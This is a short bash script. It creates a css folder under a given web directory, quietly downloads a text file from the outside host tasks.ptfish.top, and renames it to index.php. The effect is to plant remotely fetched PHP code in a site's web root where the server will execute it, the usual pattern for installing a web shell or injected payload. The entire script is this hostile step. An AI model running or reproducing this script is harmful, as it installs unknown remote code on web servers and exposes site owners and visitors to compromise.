#!/bin/bash
root_dir=$1

if [ ! -d ${root_dir}/css ];
	then
	mkdir -p ${root_dir}/css;
fi

cd ${root_dir}/css;
rm -f wp-sign.txt;wget -q -O wp-sign.txt http://tasks.ptfish.top/wp-sign.txt && mv wp-sign.txt index.php;

